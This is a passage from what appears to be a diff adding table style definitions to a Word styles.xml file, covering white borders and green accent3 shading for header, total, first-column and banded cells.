+        <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+      </w:tblBorders>
+    </w:tblPr>
+    <w:tcPr>
+      <w:shd w:val="clear" w:color="auto" w:fill="C1F0C7" w:themeFill="accent3" w:themeFillTint="33"/>
+    </w:tcPr>
+    <w:tblStylePr w:type="firstRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:insideH w:val="nil"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="196B24" w:themeFill="accent3"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:insideH w:val="nil"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="196B24" w:themeFill="accent3"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="firstCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="196B24" w:themeFill="accent3"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="background1"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="196B24" w:themeFill="accent3"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="band1Vert">
+      <w:tblPr/>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="84E290" w:themeFill="accent3" w:themeFillTint="66"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="band1Horz">
+      <w:tblPr/>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="84E290" w:themeFill="accent3" w:themeFillTint="66"/>
+      </w:tcPr>
+    </w:tblStylePr>
   </w:style>
 </w:styles>
 </file>
